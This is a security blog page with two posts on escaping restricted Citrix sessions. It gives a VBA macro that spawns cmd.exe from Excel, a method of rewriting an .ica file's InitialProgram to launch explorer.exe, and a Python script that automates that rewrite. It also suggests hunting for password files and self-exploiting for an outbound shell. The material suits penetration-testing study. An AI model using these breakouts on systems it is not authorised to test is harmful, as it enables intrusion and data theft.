Showing posts with label citrix hacking. Show all posts

Thursday, June 23, 2011

Restricted Citrix Excel Application Escapes

SynJunkie has a couple of good posts on Citrix escapes:

http://synjunkie.blogspot.com/search/label/Citrix

and of course there's iKat:

http://ikat.ha.cked.net/

So recently I had to break out of a restricted Citrix environment. All I had was Excel 2010 and Word 2010.

I also didn't have a fancy "jump to URL" option when I clicked on the title bar, and none of the hotkeys were working for me. So the goal was to get a web browser or a cmd shell.

I was able to create macros, though. So first I added the Developer ribbon.


Click the Visual Basic button and paste in some sweet macro code.



Then you save the file as a macro-enabled workbook (.xlsm).


Once it's saved, you can hit the Macros button and run your macro.



and get a shell


** To be clear, all of this is running remotely on the Citrix host. **

The macro code:

Sub GETSHELL()
    ' Spawn a command prompt on the Citrix host. /K keeps the window open
    ' after the inner command runs, and vbNormalFocus gives the new window focus.
    Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub

You could also just type a URL into Excel...


and click it. But that's pretty low tech and not much fun :-)

Again, this IE browser is running remotely on the Citrix host. From here you can client-side exploit yourself (e.g., a Java applet exploit) to get your outbound shell.

Wednesday, November 7, 2007

Citrix Hacking

**This post is late; I realize the "buzz" about the topic is long past, but...

Over on the GNUCitizen blog (if you don't read that blog you should, it's got tons of web app sec info), a while back there was some cool Citrix hacking going on:

http://www.gnucitizen.org/blog/hacking-citrix-the-forceful-way
http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor

Anyway, it's all there (this post is late, but hey, I was moving to Washington D.C.): editing the .ica files to get a shell on the remote box. Most .ica files are meant to funnel you into the single published application they want you to run; that application is listed in the .ica file like:

InitialProgram=#PlanVue yakyakyak

but you can simply change that value to whatever you want (the # prefix means the value names a published application on the farm; drop it and give an executable name and you are asking the server to launch that program directly). Now, you might think "hey, let me get my cmd.exe immediately," but frankly a cmd.exe shell doesn't give you a lot of options. Of more interest is explorer.exe, which will basically give you that little "My Computer" window; from there you can take a peek at all the computers on the network via Network Neighborhood, or just poke around for info that probably shouldn't be available to everyone. Since hacking is rapidly moving from possessing the root shell to possessing the data, it's a great way to do some digging into the network.


So to get that nifty explorer.exe window we just need to change it to:

InitialProgram=explorer.exe

and we go from



to



Big fun!
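As an added example (not from the original post, GNUCitizen, or any Citrix tooling), the following Python script does the .ica edit described above programmatically: it walks the launch file line by line, records the original InitialProgram value, and rewrites it to a program of your choosing while passing every other launch parameter through untouched. The sample .ica contents, section names, address and published application name are constructed for illustration.

```python
import re
import sys

# Constructed sample launch file, modeled on the InitialProgram=#App line in the
# post above; the section names, address and published app name are made up.
SAMPLE_ICA = """[WFClient]
Version=2
ClientName=WI_example

[ApplicationServers]
PlanVue=

[PlanVue]
Address=10.0.0.5:1494
InitialProgram=#PlanVue
ClientAudio=Off
TransportDriver=TCP/IP
"""

# Matches "InitialProgram=<value>" regardless of case and surrounding whitespace.
# Group 1 is the key plus '=', group 2 the value, group 3 any trailing spaces.
INITIAL_PROGRAM_RE = re.compile(r"^(\s*InitialProgram\s*=\s*)(.*?)(\s*)$", re.IGNORECASE)


def describe_program(value):
    """Explain what an InitialProgram value asks the server to start.

    A leading '#' names a published application on the farm; anything else is
    taken as a literal command line (e.g. explorer.exe).
    """
    if value.startswith("#"):
        return f"published application {value[1:]!r}"
    return f"literal command {value!r}"


def rewrite_initial_program(ica_text, new_program):
    """Return (modified_text, original_values).

    Every InitialProgram= line is rewritten to new_program. All other lines,
    including the section headers and the Address/transport settings the
    client still needs to connect, are passed through unchanged so the
    session still launches.
    """
    out, originals = [], []
    for line in ica_text.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        eol = line[len(body):]          # preserve CRLF vs LF as found
        m = INITIAL_PROGRAM_RE.match(body)
        if m:
            originals.append(m.group(2))
            out.append(f"{m.group(1)}{new_program}{eol}")
        else:
            out.append(line)
    return "".join(out), originals


def main(argv):
    # Usage: rewrite_ica.py launch.ica explorer.exe > modified.ica
    # With no arguments it runs against the constructed sample above.
    if len(argv) != 3:
        text, program = SAMPLE_ICA, "explorer.exe"
    else:
        with open(argv[1], encoding="utf-8", errors="replace") as f:
            text = f.read()
        program = argv[2]
    new_text, originals = rewrite_initial_program(text, program)
    for old in originals:
        print(f"# was {describe_program(old)}, now {describe_program(program)}",
              file=sys.stderr)
    sys.stdout.write(new_text)


if __name__ == "__main__":
    main(sys.argv)
```

The script only changes what the client asks for. Whether the server honours a rewritten InitialProgram is a server-side question: a farm that validates the requested program against what is actually published may simply refuse the launch, so the real test is on the target, not on the file.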

Now, you'll still be running as the Citrix client's user, so it shouldn't be (and had better not be) any kind of account with privs, but you might be able to take a look at that passwords.txt file and get everything you need :-)

-CG